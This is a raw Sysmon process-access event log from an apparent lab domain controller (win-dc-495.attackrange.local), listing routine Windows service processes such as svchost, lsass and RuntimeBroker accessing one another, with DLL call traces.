13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.899{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.836{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.821{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.789{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.774{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.758{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.742{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.742{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
